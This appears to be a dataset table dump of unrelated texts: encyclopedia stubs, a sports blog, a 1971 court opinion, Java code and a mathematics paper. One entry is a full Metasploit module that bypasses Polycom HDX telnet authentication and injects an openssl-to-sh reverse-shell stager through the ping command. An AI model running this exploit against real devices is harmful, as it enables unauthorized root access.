text
stringlengths 11
3.65M
|
|---|
The bridled frog, bridle frog or tawny rocket frog (Litoria nigrofrenata) is a frog from Australia and Papua New Guinea. It lives in the Cape York Peninsula, islands in the Torres Strait, and northern Queensland and the Northern Territory.
This frog is about 45 mm long from nose to rear end. It is pale tan to dark red-brown in colour. This frog is known for its very clear black stripes, which can be long or short.
This frog lives in forests and swamps near dams and small streams.
It lays eggs 450 at a time in pools and streams. |
The NFL draft and a majority of free agency is in the books for 2015. That means it's time for early projections and predictions for this upcoming season.
Last week, many Dolphins fans were disappointed with ESPN.com's Power Rankings. Our expect panel rated the Miami Dolphins as a middle-of-the pack team at No. 15, which is pretty much the equivalent of another .500 season. Miami made a lot of roster improvements to make a playoff push, including the $114 million signing of Pro Bowl defensive tackle Ndamukong Suh.
However, another reputable source is projecting the Dolphins to do great things in 2015. According to Football Outsiders, Miami is a "hot sleeper Super Bowl contender." FBO, using its metrics and also anticipating a Tom Brady suspension, predicts the Dolphins will go 11-5 in the AFC East.
Do Miami fans agree or disagree? The Dolphins have talent and filled a lot of holes this offseason. Can they post a winning season and get to the playoffs for the first time since 2008?
Share your thoughts in the comment section below or send me a message via Twitter @JamesWalkerNFL. I'm curious to hear your thoughts on Miami potentially going 11-5 this upcoming season. |
Mike Harrison (3 September 1945 - 25 March 2018) was an English musician and singer. He was known as a principal lead singer of Spooky Tooth. He has also been the lead singer in The V.I.P.s, Art and the Hamburg Blues Band, among others.
Harrison died in Carlisle, Cumbria on 25 March 2018 at the age of 72. |
336 F.Supp. 1020 (1971)
Steve J. HORWAT, as Administrator of the Estate of Edward Horwat, also known as Edward S. Horwat, Deceased, Plaintiff,
v.
PAULSEN-WEBBER CORDAGE CORPORATION, Defendant and Third-Party Plaintiff,
v.
BABCOCK & WILCOX COMPANY et al., Third-Party Defendants.
Deborah MORRISON, Administratrix, D.B.N. of the Estate of Kenneth D. Richter, Deceased, Plaintiff,
v.
PAULSEN-WEBBER CORDAGE CORPORATION, Defendant and Third-Party Plaintiff,
v.
BABCOCK & WILCOX COMPANY et al., Third-Party Defendants.
Civ. A. Nos. 69-798, 69-799.
United States District Court, W. D. Pennsylvania.
December 7, 1971.
*1021 David E. Cohen, Uniontown, Pa., J. M. Maurizi, Suto, Power, Balzarini & Walsh, Pittsburgh, Pa., for plaintiffs.
Theodore O. Struk, Thomas W. Smith, Dickie, McCamey & Chilcote, Pittsburgh, Pa., for defendant.
OPINION
TEITELBAUM, District Judge.
These are personal injury actions in which the plaintiffs have founded the jurisdiction of this Court on the diversity of citizenship alleged to exist between the parties. The plaintiffs are alleged to be citizens of Pennsylvania, and the defendant, Paulsen-Webber Cordage Corporation, a citizen of New York. Paulsen-Webber contests the allegation of its citizenship, and, asserting that it is a citizen of Pennsylvania by virtue of the location of its principal place of business, has filed a Motion to Dismiss for want of federal jurisdiction.
Section 1332(c) of Title 28, United States Code provides that, in determining whether or not citizenship between parties is diverse,
". . . a corporation shall be deemed a citizen of any State by which it has been incorporated and of the State where it has its principal place of business . . . ."
The defendant was incorporated in New York. It contends, however, that its principal place of business is in Pennsylvania.
The controlling legal standards by which to assess the facts in fixing a corporation's principal place of business are set forth in Kelly v. United States Steel Corporation, 284 F.2d 850 (3d Cir. 1960). There the issue concerned United States Steel Corporation's principal place of business. The Court decided that the center of operational activities rather than the situs of corporate policy and decision making indicated the principal place of business. Of "lesser importance" to the Court but nonetheless of "some significance" were the locations of the corporation's physical plants, tangible assets, and employees. Further, it is the law that only the incidents of the defendant corporation are relevant, i. e., its corporate veil is generally not to be pierced for the purpose of aggregating its corporate incidents with those of its subsidiary companies. Carnera v. Lancaster Chemical Corporation, 387 F.2d 946 (3d Cir. 1967), cert. denied, 390 U.S. 1027, 88 S. Ct. 1418, 20 L.Ed.2d 285; see Zubik v. Zubik, 384 F.2d 267 (3d Cir. 1967), cert. denied, 390 U.S. 988, 88 S.Ct. 1183, 19 L.Ed.2d 1291 (1968).
In the instant actions, the application of these principles fixes the principal place of Paulsen-Webber's business in Pennsylvania. While Frederick Paulsen, the president, sole stockholder, and principal decision-maker of Paulsen-Webber, maintains his office in New York at corporate headquarters, the center of the defendant's operational activities is in Pennsylvania. Not counting its subsidiary companies' operations (which are relatively insignificant in any event), virtually all of the defendant's (1) products are manufactured in Pennsylvania, and (2) tangible assets are located in Pennsylvania. Further, the Pennsylvania operations account for the majority of the defendant's employees and the plurality of its customers and sales. The only sound conclusion is that the defendant's principal place of business is in Pennsylvania. Therefore, its Motion to Dismiss must be granted.
|
Drosophila subobscura is a species of fruit fly in the family Drosophilidae.
It was originally found around the Mediterranean, but it has spread to most of Europe and the Near East. It has been introduced into the west coasts of Canada, the United States, and Chile.
This species is in the Sophophora subgenus.
Study organism for evolutionary biology
In 1933, A.H. Sturtevant captured a species of Drosophila in England. It was a member of Drosophila subobscura.
D. subobscura, with others in its species group, is a model organism for evolutionary-biological studies. Its genetics and ecology have been studied for over fifty years.
They have served as favourable models ever since Dobzhansky and his colleagues published their influential works in the 1930s and 40s.
Their use as a regular laboratory fly was promoted by J.B.S. Haldane and John Maynard Smith at University College London over a period of about 30 years. There it was used for research into population genetics, and for teaching genetics. For many years this species was the European "rival" to the D. pseudoobscura favoured by the group in California led by Dobzhansky. |
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Polycom Command Shell Authorization Bypass',
'Alias' => 'psh_auth_bypass',
'Author' =>
[
'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>', # module
'h00die <[email protected]>', # submission/cleanup
],
'DisclosureDate' => 'Jan 18 2013',
'Description' => %q(
The login component of the Polycom Command Shell on Polycom HDX
video endpints, running software versions 3.0.5 and earlier,
is vulnerable to an authorization bypass when simultaneous
connections are made to the service, allowing remote network
attackers to gain access to a sandboxed telnet prompt without
authentication. Versions prior to 3.0.4 contain OS command
injection in the ping command which can be used to execute
arbitrary commands as root.
),
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Polycom%20HDX%20Telnet%20Authorization%20Bypass%20-%20RELEASE.pdf' ],
[ 'URL', 'http://blog.tempest.com.br/joao-paulo-campello/polycom-web-management-interface-os-command-injection.html' ],
[ 'EDB', '24494']
],
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => true,
'Targets' => [ [ "Universal", {} ] ],
'Payload' =>
{
'Space' => 8000,
'DisableNops' => true,
'Compat' => { 'PayloadType' => 'cmd' }
},
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl' },
'DefaultTarget' => 0
)
)
register_options(
[
Opt::RHOST(),
Opt::RPORT(23),
OptAddress.new('CBHOST', [ false, "The listener address used for staging the final payload" ]),
OptPort.new('CBPORT', [ false, "The listener port used for staging the final payload" ])
], self.class
)
register_advanced_options(
[
OptInt.new('THREADS', [false, 'Threads for authentication bypass', 6]),
OptInt.new('MAX_CONNECTIONS', [false, 'Threads for authentication bypass', 100])
], self.class
)
end
def check
connect
sock.put(Rex::Text.rand_text_alpha(rand(5) + 1) + "\n")
Rex.sleep(1)
res = sock.get_once
disconnect
if !res && !res.empty?
return Exploit::CheckCode::Safe
end
if res =~ /Welcome to ViewStation/
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Safe
end
def exploit
# Keep track of results (successful connections)
results = []
# Random string for password
password = Rex::Text.rand_text_alpha(rand(5) + 1)
# Threaded login checker
max_threads = datastore['THREADS']
cur_threads = []
# Try up to 100 times just to be sure
queue = [*(1..datastore['MAX_CONNECTIONS'])]
print_status("Starting Authentication bypass with #{datastore['THREADS']} threads with #{datastore['MAX_CONNECTIONS']} max connections ")
until queue.empty?
while cur_threads.length < max_threads
# We can stop if we get a valid login
break unless results.empty?
# keep track of how many attempts we've made
item = queue.shift
# We can stop if we reach max tries
break unless item
t = Thread.new(item) do |count|
sock = connect
sock.put(password + "\n")
res = sock.get_once
until res.empty?
break unless results.empty?
# Post-login Polycom banner means success
if res =~ /Polycom/
results << sock
break
# bind error indicates bypass is working
elsif res =~ /bind/
sock.put(password + "\n")
# Login error means we need to disconnect
elsif res =~ /failed/
break
# To many connections means we need to disconnect
elsif res =~ /Error/
break
end
res = sock.get_once
end
end
cur_threads << t
end
# We can stop if we get a valid login
break unless results.empty?
# Add to a list of dead threads if we're finished
cur_threads.each_index do |ti|
t = cur_threads[ti]
unless t.alive?
cur_threads[ti] = nil
end
end
# Remove any dead threads from the set
cur_threads.delete(nil)
Rex.sleep(0.25)
end
# Clean up any remaining threads
cur_threads.each { |sock| sock.kill }
if !results.empty?
print_good("#{rhost}:#{rport} Successfully exploited the authentication bypass flaw")
do_payload(results[0])
else
print_error("#{rhost}:#{rport} Unable to bypass authentication, this target may not be vulnerable")
end
end
def do_payload(sock)
# Prefer CBHOST, but use LHOST, or autodetect the IP otherwise
cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])
# Start a listener
start_listener(true)
# Figure out the port we picked
cbport = self.service.getsockname[2]
# Utilize ping OS injection to push cmd payload using stager optimized for limited buffer < 128
cmd = "\nping ;s=$IFS;openssl${s}s_client$s-quiet$s-host${s}#{cbhost}$s-port${s}#{cbport}|sh;ping$s-c${s}1${s}0\n"
sock.put(cmd)
# Give time for our command to be queued and executed
1.upto(5) do
Rex.sleep(1)
break if session_created?
end
end
def stage_final_payload(cli)
print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...")
cli.put(payload.encoded + "\n")
end
def start_listener(ssl = false)
comm = datastore['ListenerComm']
if comm == 'local'
comm = ::Rex::Socket::Comm::Local
else
comm = nil
end
self.service = Rex::Socket::TcpServer.create(
'LocalPort' => datastore['CBPORT'],
'SSL' => ssl,
'SSLCert' => datastore['SSLCert'],
'Comm' => comm,
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self
}
)
self.service.on_client_connect_proc = proc { |client|
stage_final_payload(client)
}
# Start the listening service
self.service.start
end
# Shut down any running services
def cleanup
super
if self.service
print_status("Shutting down payload stager listener...")
begin
self.service.deref if self.service.is_a?(Rex::Service)
if self.service.is_a?(Rex::Socket)
self.service.close
self.service.stop
end
self.service = nil
rescue ::Exception
end
end
end
# Accessor for our TCP payload stager
attr_accessor :service
end
|
Introducing Joss Stone is the third studio album by English singer-songwriter Joss Stone. It was released on 9 March 2007 by Virgin Records. The album peaked at number 12 on the UK Albums Chart. In the United States, it debuted at number two on the Billboard 200 chart.
Reviews
Introducing Joss Stone received mixed to positive criticism from critics.
Track listing
Sampling credits
"Headturner" contains an interpolation of "Respect" by Otis Redding.
"Music" contains an interpolation of "The Mask" by the Fugees.
"Proper Nice" contains an interpolation of "Catch Me (I'm Falling)" by Pretty Poison.
Personnel
Credits adapted from the liner notes of Introducing Joss Stone.
Joss Stone - lead vocals, executive producer, art direction, A&R
Isaiah Abolin - assistant engineering
Jawara Adams - trumpet
Chalmers "Spanky" Alford - guitar
Chris Anokute - A&R
Mike Boden - assistant engineering
Oswald Bowe - assistant engineering
Brian Bowen Smith - photography
Chuck Brungardt - mixing, recording ; Pro Tools operator
Jonathan "Meres" Cohen - body painting, graffiti
Anthony Coleman - trumpet
Lois Colin - harp
Common - vocals
Tom Coyne - mastering
Reggie Dozier - string recording ; horn recording
Joi Gilliam - backing vocals
David Gorman - design
Steve Greenwell - additional recording ; vocal recording
Charlie Happiness - clavinet
Lauryn Hill - vocals
Lionel Holoman - organ ; Rhodes ; keyboards ; Wurlitzer
Keisha Jackson - backing vocals
Priscilla Jones Campbell - backing vocals
Vinnie Jones - voiceover
Justin Kessler - Pro Tools operator
Dave Larring - additional recording
Joshua Lutz - mural
Jeremy Mackenzie - Pro Tools operator
Marlon Marcel - assistant engineering
Kate McGregor - art coordinator
Mix Master Mike - turntables
Dror Mohar - assistant engineering
Sean Mosher-Smith - art direction
Robert Ozuna - sitar ; percussion ; additional drums ; drums ; turntables
Khari Parker - percussion ; drums ; additional drums
Jermaine Paul - backing vocals
Tino Richardson - saxophone
Raphael Saadiq - production ; bass ; guitar ; backing vocals ; horn arrangements ; keyboards ; piano
Bob Scott - photography
Ian Shea - assistant engineering
Luke Smith - assistant engineering
Scott Somerville - assistant engineering
Glenn Standridge - mixing, production coordinator, recording
Charlie Stavish - assistant engineering
Neil Symonette - percussion
James Tanksley - assistant engineering
John Tanksley - assistant engineering
Amy Touma - A&R
Seamus Tyson - assistant engineering
Kenneth "Scooter" Whalum III - tenor saxophone ; baritone saxophone
Benjamin Wright - string arrangements ; horn arrangements
James Zellar - trombone |
/*
* Copyright 2013 Stanley Shyiko
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.github.shyiko.mysql.binlog.network.protocol;
import com.github.shyiko.mysql.binlog.io.ByteArrayInputStream;
import java.io.IOException;
/**
* @author <a href="mailto:[email protected]">Stanley Shyiko</a>
*/
public class ErrorPacket implements Packet {
private int errorCode;
private String sqlState;
private String errorMessage;
public ErrorPacket(byte[] bytes) throws IOException {
ByteArrayInputStream buffer = new ByteArrayInputStream(bytes);
this.errorCode = buffer.readInteger(2);
if (buffer.peek() == '#') {
buffer.skip(1); // marker of the SQL State
this.sqlState = buffer.readString(5);
}
this.errorMessage = buffer.readString(buffer.available());
}
public int getErrorCode() {
return errorCode;
}
public String getSqlState() {
return sqlState;
}
public String getErrorMessage() {
return errorMessage;
}
}
|
Q
1297 Quadea
50000 Quaoar
1239 Queteleta
1915 Quetzalcoatl
755 Quintilla |
---
abstract: 'We give here an explicit formula for the following critical case of the growth-fragmentation equation $${\frac}{{\partial}}{{\partial}t} u(t,x) + {\frac}{{\partial}}{{\partial}x} (g x u(t,x))+bu(t,x)=b \alpha^2 u(t,\alpha x),\qquad u(0,x)=u^0(x),$$ for some constants $g>0,$ $b>0$ and $\alpha>1$ - the case $\alpha=2$ being the emblematic binary fission case. We discuss the links between this formula and the asymptotic ones previously obtained in [@DE], and use them to clarify how periodicity may appear asymptotically.'
author:
- 'Marie Doumic[^1] [^2]'
- 'Bruce van Brunt[^3]'
title: 'Explicit solution and fine asymptotics for a critical growth-fragmentation equation'
---
Introduction {#introduction .unnumbered}
============
Growth-fragmentation equations appear in many applications, ranging from protein polymerisation to internet protocols or cell division equation. Under a fairly general form it may be written as follows $${\frac}{{\partial}}{{\partial}t} u(t,x) + {\frac}{{\partial}}{{\partial}x} \big(g (x) u (t,x)\big) + B(x)u(t,x)=\int\limits_x^\infty k(y,x) B(y) u(t,y) dy,$$ where $u(t,x)$ represents the concentration of individuals of size $x$ at time $t,$ $g$ their growth speed, $B$ the total instantaneous fragmentation probability rate and $k(y,x)$ the fragmentation probability of fragmenting individuals of size $y$ to give rise to individuals of size $x.$ Under assumptions linking fragmentation and growth parameters $B,$ $k$ and $g$, a steady asymptotic behaviour appears, *i.e.* there exists a unique couple $(\lambda,U)$ with $\lambda>0$ such that $u(t,x) e^{-\lambda t} \to U(x)$ - see for instance the pioneering papers [@DiekmannHeijmansThieme1984; @HallWake_1989], [@BP] for an introduction and many other references like [@Zaidi_2015; @Der4; @Zai] for some most recent ones. [ This asymptotic behaviour is a key property of many models in the field of structured population dynamics, and in many cases such as bacterial growth it is experimentally observed [@robert:hal-00981312] (the biologists speak of “desyncrhonization effect”)]{}.However, such a steady behaviour may also fail for two types of reasons:
1. the balance assumptions between $B,$ $g$ and $k$ are not satisfied,
2. Growth and fragmentation are such that there is a lack of dissipativity in the equation. This is typically the case when the growth is exponential, *i.e.* $g(x)=gx,$ and the fragmentation is a dirac, $k(y,x)=\alpha\delta_{{\frac}{x}{y}={\frac}{1}{\alpha}}$ with $\alpha>1.$ In such a case, if the division rate $B$ is such that there exists a positive couple $(\lambda,U)$, there also exists a countable set of complex couples of the form $(\lambda+i\theta_k, U_k),$ which leads to a periodic limit cycle, see [@GreinerNagel; @bernard:hal-01363549].
We focus here on a critical case where both these reasons appear, namely $B(x)\equiv b>0$ - also called “homogeneous fragmentation” - $g(x)\equiv x g$ and $k(y,x)=\alpha\delta_{{\frac}{x}{y}={\frac}{1}{\alpha}},$ which generalises the binary fission case $\alpha=2$. The equation under study is thus $$\label{eq:main}
{\frac}{{\partial}}{{\partial}t} u(t,x) + {\frac}{{\partial}}{{\partial}x} (g x u(t,x))+bu(t,x)=b \alpha^2 u(t,\alpha x),\qquad u(0,x)=u^0(x).$$ This is a specific case of the homogeneous fragmentation equation studied in [@MR2017852; @BertoinWatson; @DE]. [ It may also be seen as an emblematic case when modelling bacterial growth, since the exponential growth in size of bacteria has been observed, together with equal mitosis ($\alpha=2$). A constant division rate would then correspond to a growth independent of the size. However, the behaviour that we study in this paper is barely observed in nature, since a tiny variability in the coefficient rates or in the fragmentation kernel is sufficient to drive the system towards a steady asymptotic growth. It is thus important for modellers to include such a slight variability rather than using directly the idealised model under study.]{} The main results obtained in [@DE] were the following:
- a formulation in terms of Mellin and inverse Mellin transform was obtained, as soon as the initial condition $u_0$ decays sufficiently fast in $0$ and $\infty$,
- no steady or self-similar behaviour was possible for $L^1$ functions,
- the asymptotic behaviour was described along lines of the type $x=e^{-ct},$ with an exponential speed of convergence at places where the mass was decaying, but with at most polynomial growth for the lines where the mass concentrates,
- in the case of a fragmentation kernel defined as a dirac mass (or a sum of dirac masses linked by a specific algebraic relation), the asymptotic behaviour was also defined thanks to the Mellin transform, but was more involved, with an infinite sum of contributions and a still slower polynomial rate of convergence.
Despite these results, a question remains unclear: can we observe a kind of “oscillatory” behaviour, as in the case of a limit cycle [@GreinerNagel; @bernard:hal-01363549]?
In Proposition \[prop:explicit\], we first provide an explicit solution of Equation and discuss its interpretation, in particular in terms of possible periodicity. In Section \[sec:asymp\], we investigate in more detail the asymptotic behaviour, based on the estimates obtained in [@DE] and with the help of a rescaling inspired by [@MR2017852].
An explicit formulation
=======================
Explicit formulations may be obtained, as said above, via the Mellin transform of the equation - the Mellin transform has also been used in other studies for the qualitative behaviour of solutions of equations of the same type, see for instance [@BDE; @vanbrunt_wake_2011; @DET2017; @Escobedo2016; @Escobedo2017]. Analytical solutions for specific cases of the eigenvalue problem have also been given in some studies, see e.g. [@HallWake_1990; @PR; @DG] for some examples.
Else, obtaining analytical solutions for the time-dependent equation is not frequent - let us mention [@Stewart90; @ZiffGrady] for the fragmentation equation, and [@Zai] for the full analytical solution to the cell division equation with constant coefficients. Up to our knowledge, the following explicit solution for our case was not known.
\[prop:explicit\] Let ${\cal S}'(\operatorname{{\mathbb R}}_+)$ the space of distribution functions (dual space of ${\cal S}(\operatorname{{\mathbb R}}_+)$ the Schwartz space on $\operatorname{{\mathbb R}}_+$) and $u_0\in {\cal S}'(\operatorname{{\mathbb R}}_+)$. The distribution defined in a weak sense by $$\label{def:u}
u(t,x)=e^{-(b+g)t} \sum\limits_{k=0}^\infty u_0(\alpha^k x e^{-gt}) {\frac}{(b\alpha^2 t)^k}{k!},\qquad t>0,\quad x>0,$$ is solution to Equation . Moreover, if $u_0\in L^p(x^qdx)$ then $u \in L^\infty(0,T;L^p(x^q dx))$ for any $T>0,$ $p\in [1,\infty]$ and $q\in \operatorname{{\mathbb R}}.$ Similarly, if $u_0\in {\cal M}_+^b (x^qdx)$ the space of nonnegative bounded measures absolutely continuous with respect to the measure $x^q dx,$ $u \in L^\infty(0,T;{\cal M}_+^b (x^qdx)).$
The spaces to which $u(t,x)$ belongs to are immediate by using the definition , multiplying it by the convenient weight or test function, and make a term-by-term change of variables $y=\alpha^k x e^{-gt};$ it is linked to the fast convergence of the terms ${\frac}{s^k}{k!}$ defining the series of the exponential. The proof that $u(t,x)$ satisfies Equation in a weak sense can be done similarly, by multiplying the equation applied to $u(t,x)$ by a test function, integrating by parts and making a change of variables.
This formula makes directly appear several interesting features, linked to the very specific shape of the fragmentation kernel $k_0(z)=\alpha\delta_{z={\frac}{1}{\alpha}}.$
- At time $t=0^+,$ there is an immediate appearance of contributions to the distribution in $x$ of all the points $\alpha^k x$ with $k\geq 0.$ This can be interpreted in terms of division: without growth, cells of size $x$ contained in an interval $[x,x+dx]$ may come from $k$ times the division of cells of size $\alpha^k x,$ contained in the interval $[\alpha^kx, \alpha^k (x+dx)]$, this division producing $\alpha^k$ cells of size $x$ so that there is a factor $\alpha^{2k}$ in the contribution coming from the division of size $[\alpha^k x, \alpha^k x +\alpha^k dx]$ particles. Now, the probability of $k$ successive division of given cells of size $\alpha^k x$ in a time interval $\delta t$ is proportional to ${\frac}{b^k (\delta t)^k}{k!},$ the product of $k$ times the probability for a cell to divide taken among an infinite possibility of divisions, and then renormalised by $e^{-b\delta t}$ to obtain a total probability equal to $1$ on all the possibilities to divide $0,$ $1,$ $\dots$ $k$ times. When time passes, this remains true, and the formula follows the characteristic lines $x e^{gt}: $ without the birth term on the right-hand side, the solution of the equation $${\frac}{{\partial}}{{\partial}t} u +{\frac}{{\partial}}{{\partial}x} (g x u(t,x))+bu(t,x)=0$$ would be $u(t,x)=e^{-(b+g)t}u_0(xe^{-gt}),$ the first term of the series; on the contrary, without the growth and the left-hand side division term, the equation $${\frac}{{\partial}}{{\partial}t} u =b \alpha^2 u(t,\alpha x),\qquad u(0,x)=u^0(x)$$ would admit for solution $ \sum\limits_{k=0}^\infty u_0(\alpha^k x) {\frac}{(b\alpha^2 t)^k}{k!}$ for $t>0$ and $x>0.$
- Contrarily to other cases (with a smoother fragmentation kernel or a non-linear growth rate), we see that the equation has no smoothing effect. Taking for instance the case of a dirac initial data $u_0(x)=\delta_{x_0},$ we see that as expected intuitively the mass is permanently supported by a countable set of dirac masses, taking values along characteristic lines $x=\alpha^{-k} x_0 e^{gt}$ representing, for $k=0,$ the ancestor characteristic curve, and for $k\geq 1,$ the characteristic line of the $k-th$ generation of offspring (individuals having divided $k$ times at time $t$).
Despite its simple formulation, the analytical formula does not lead directly to an easy asymptotic behaviour. This was also the case with the formulation obtained in [@DE] using Mellin and inverse Mellin transform: a complete asymptotic analysis of the complex integral was necessary to obtain an asymptotic behaviour.
However, an important clue is given to the question of possible oscillations when looking at the solution obtained for $u_0=\delta_{x_0}:$ the mass is permanently supported in the countable set of dirac at points $x=\alpha^{-k}e^{gt}x_0$ for $k\in \operatorname{{\mathbb N}}$, so that at each period of time $t=nT$ such that $e^{gT}=\alpha,$ and only at them, the dirac masses come back to the points $x=\alpha^{-k+n}x_0$. This set tends to the countable set $x=\alpha^k x_0$ with $k\in \operatorname{{\mathbb Z}}.$ But can we say more concerning the mass of each of these points?
In a more general manner, if $supp (u_0)\subset [x_0,x_1]$, at any time one has $supp (u(t,\cdot))\subset \cup_{k\in\operatorname{{\mathbb N}}} [2^{-k} x_0e^{gt},2^{-k} x_1 e^{gt}]$ for $k\in \operatorname{{\mathbb N}}:$ if for instance ${\frac}{1}{2}<x_0<x_1\leq 1,$ we have $supp\left(u(t,\cdot)\right) \cap \cup_{k\in\operatorname{{\mathbb N}}} (2^{-k-1}e^{gt},2^{-k}x_0e^{gt})=\emptyset.$ It is thus clear that no *pointwise* limit toward a steady behaviour is possible.
Asymptotic behaviour {#sec:asymp}
====================
Asymptotics via the Mellin transform [@DE]
------------------------------------------
Let us here assume $g=0$ and $b=1,$ denote $v(t,x)$ the corresponding solution of the pure fragmentation equation, we know that $u(t,x)=e^{-gt} v(bt,xe^{-gt})$, and Formula becomes $$\label{def:frag}
v(t,x)=e^{-t}\sum\limits_{k=0}^\infty u_0(\alpha^k x) {\frac}{(\alpha^2 t)^k}{k!}.$$ In [@DE], another explicit formula was obtained using Mellin and inverse Mellin transform. For the sake of simplicity, we restrict ourselves to $u_0 \in {\cal C}^2_0 (\operatorname{{\mathbb R}}_+),$ the space of two-times differentiable functions on $R_+$ decaying faster than any power law in $0$ and $+\infty$ (see Theorem 3.1. in [@DE] for more general assumptions).
Define $$\label{def:Mellin}
K(s)=\int\limits_0^1x^{s-1} \alpha\delta_{x={\frac}{1}{\alpha}} dx=\alpha^{2-s},\qquad U_0(s)=\int\limits_0^\infty u_0(x)x^{s-1}dx,$$ we have (Theorem 3.1. in [@DE]), for $g=0$ and $b=1,$ and any $\nu\in \operatorname{{\mathbb R}}:$ $$\label{eq:Mellin}
v(t, x)=\frac {1} {2\pi i}\int \limits _{ \nu-i\infty }^{ \nu+i\infty }U_0(s)\,e^{(K(s)-1)t}x^{-s}ds.$$ [ Following the notations of [@DE], the fragmentation kernel is in our case equal to $k(y,x)={\frac}{1}{y}k_0({\frac}{x}{y})$ with $k_0(z)=\alpha\delta_{z={\frac}{1}{\alpha}}.$ We see that $k_0$ satisfies the assumptions of Theorem 2.3. (b) of [@DE], namely that it is a singular discrete measure whos support satisfies the Assumption H of [@DE] - since it is a unique point $\theta={\frac}{1}{\alpha}$.]{} The following asymptotic formula was then obtained in Theorem 2.3. (b) of [@DE] for $x<1$: $$\label{asymp1:v}
v(t, x)=x^{-s_+(t, x)}e^{(\alpha^{2-s_+(t, x)}-1)t}\frac{ \sum\limits_{ k\in \operatorname{{\mathbb Z}}}U_0(s_k)
e^{\frac {2i\pi k } {\log \alpha}\log x}}{{\sqrt{2\pi t} (\log\alpha) \alpha^{1-{\frac}{s_+(t,x)}{2}} }}\left(1+o(t^{-\beta})\right),$$ for some $\beta>0$ and $s_+(t,x)$ defined by $$s_+(t,x)=K'^{-1}\left({\frac}{\log x}{t}\right)=2-{\frac}{\log\biggl(-{\frac}{\log(x)}{t\log\alpha}\biggr)}{\log\alpha},\qquad
x=e^{-t(\log\alpha)\alpha^{2-s_+}},\qquad
s_k=s_+{-}{\frac}{2ik\pi}{\log \alpha}.$$ Using the Poisson formula, it was also noticed in Remark 3 of [@DE] that it gives $$\label{asymp2:v}\begin{array}{ll}
v(t,x) &= e^{(\alpha^{2-s_+(t, x)}-1)t} \frac{ \sum\limits_{ n\in \operatorname{{\mathbb Z}}} u_0(\alpha^n x) \alpha^{s_+ n}}{{\sqrt{2\pi t} \alpha^{1-{\frac}{s_+(t,x)}{2}} }}\left(1+o(t^{-\beta})\right).
\end{array}$$ By a straightforward calculation, we can use this formula to obtain the asymptotic formulae for the general case $b,g>0,$ by the transformation $u(t,x)=e^{-gt}v(bt,xe^{-gt}).$ We take however here $b=1$ for the sake of simplicity, and still denote in short $s_+$ the function now defined in $s_+(t,xe^{-gt}).$ We have $$\label{mellin:asymp:growthfrag}\begin{array}{l}
u(t,x)\sim x^{-s_+(t, xe^{-gt})}e^{(\alpha^{2-s_+(t, xe^{-gt})}-1+g(s_+-1))t}\frac{ \sum\limits_{ k\in \operatorname{{\mathbb Z}}}U_0(s_k)
e^{\frac {2i\pi k } {\log \alpha}\log x}}{{\sqrt{2\pi t} (\log\alpha) \alpha^{1-{\frac}{s_+(t,xe^{-gt})}{2}} }}(1+o(t^\beta)),
\\ \\
u(t,x) \sim e^{(\alpha^{2-s_+(t, xe^{-gt})}-1-g)t} \frac{ \sum\limits_{ n\in \operatorname{{\mathbb Z}}} u_0(\alpha^n xe^{-gt}) \alpha^{s_+ n}}{{\sqrt{2\pi t} \alpha^{1-{\frac}{s_+(t,xe^{-gt})}{2}} }}.
\end{array}$$ Despite its resemblance with , no immediate link appears.
Weak convergence result
-----------------------
Can we use the formula or to make appear an oscillatory asymptotic behaviour? Following [@MR2017852], let us first focus on the following rescalings of $v:$ $$r(t,y):=te^{2ty}v(t,e^{ty})=t e^{2ty+gt} u({\frac}{t}{b},e^{(y+g)t}) ,\qquad y_0:=-\log\alpha,$$ $$\tilde r(t,z)=r(t,y_0+{\frac}{\sigma z}{\sqrt{t}}){\frac}{\sigma}{\sqrt{t}}, \qquad \qquad \sigma^2=K''(y_0)=(\log\alpha)^2.$$ Such a rescaling is motivated by the fact that the lines $x=e^{ty},$ with $y<0$ constant, correspond to the lines $s_+(t,x)$ constant in time, leading to a given asymptotic profile in or . Moreover it is such that the integral of $r$ and $\tilde r$ is preserved, *i.e.* $$\int\limits_{-\infty}^\infty r(t,y) dy = \int\limits_{-\infty}^\infty \tilde r(t,y) dy=\int\limits_0^\infty x v(t,x) dx=\int\limits_0^\infty x u_0(x) dx,\qquad \forall\; t\geq 0.$$ Theorem 1 in [@MR2017852] apparently contradicts any oscillatory behaviour by stating the following weak convergence result, for which we sketch below an alternative proof using Formula .
Let $u_0\in {\cal C}^2_0(\operatorname{{\mathbb R}}_+)$. $$r(t,\cdot) \rightharpoonup \delta_{-\log\alpha}U_0(2),\qquad
\tilde r(t,\cdot) \rightharpoonup U_0(2)G,$$ with $G(z)={\frac}{e^{-{\frac}{\cdot^2}{2}}}{\sqrt{2\pi} }$ in a weak sense: for any bounded $C^1$ function $\phi$ on $\operatorname{{\mathbb R}},$ we have $$\int\limits_{-\infty}^{+\infty} \phi(y)r(t,y)dy \to U_0(2) \phi(-\log\alpha)\; \hbox{{\text{and}}}\; \int\limits_{-\infty}^{+\infty} \phi(z)\tilde r(t,z)dz \to U_0(2) \int\limits_{-\infty}^{+\infty} \phi(z) {\frac}{e^{-{\frac}{z^2}{2}}}{\sqrt{2\pi} }dz,$$ with $U_0(2)=\int\limits_0^\infty x u_0(x)dx$ the initial mass and $K'(2)=\log\alpha$.
